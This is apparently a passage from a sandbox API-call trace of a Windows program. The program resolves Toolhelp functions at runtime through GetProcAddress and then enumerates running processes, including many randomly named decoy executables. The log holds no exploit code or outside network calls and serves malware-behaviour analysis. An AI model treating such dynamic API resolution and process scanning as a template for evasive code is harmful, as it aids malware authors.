lpProcName="Process32First") returned 0x7697443d [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x1312d4c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32Next", lpUsedDefaultChar=0x0) returned 13 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Process32Next") returned 0x76974505 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x1312d4c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x1312d4c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x1312d4c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x1312d4c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x1312d4c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32First", lpUsedDefaultChar=0x0) returned 13 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Thread32First") returned 0x76977e4c [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x1312d4c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32Next", lpUsedDefaultChar=0x0) returned 12 [0094.329] GetProcAddress (hModule=0x76910000, lpProcName="Thread32Next") returned 0x76977edc [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x1312d4c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32First", lpUsedDefaultChar=0x0) returned 13 [0094.329] GetProcAddress (hModule=0x76910000, lpProcName="Module32First") returned 0x769a0859 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x1312d4c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32Next", lpUsedDefaultChar=0x0) returned 12 [0094.329] GetProcAddress (hModule=0x76910000, lpProcName="Module32Next") returned 0x769a0942 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", 
cchWideChar=14, lpMultiByteStr=0x1312d4c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0094.329] GetProcAddress (hModule=0x76910000, lpProcName="Module32FirstW") returned 0x7694c59e [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x1312d4c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0094.329] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x1312d4c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0094.329] GetProcAddress (hModule=0x76910000, lpProcName="Module32FirstW") returned 0x7694c59e [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x1312d4c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", 
lpUsedDefaultChar=0x0) returned 13 [0094.329] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0094.329] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xcc [0094.334] Process32FirstW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0094.335] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0094.335] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0094.336] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.337] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0094.337] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.338] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: 
lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0094.339] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0094.339] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0094.340] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0094.341] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.341] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.342] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.343] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: 
lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.343] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.344] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0094.345] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.345] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.346] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0094.347] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.348] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: 
lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0094.349] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0094.350] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0094.351] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0094.353] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.354] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0094.355] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0094.356] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | 
out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0094.357] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0094.359] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0094.360] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0094.361] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0094.362] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0094.363] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0094.364] Process32NextW 
(in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0094.365] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0094.367] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0094.368] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0094.369] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0094.370] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0094.371] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 
[0094.372] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0094.373] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0094.423] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0094.424] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0094.426] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0094.427] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.429] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dllhost.exe")) returned 1 [0094.430] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0094.431] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0094.433] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.434] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xac4, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0094.435] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0094.437] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0094.438] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, 
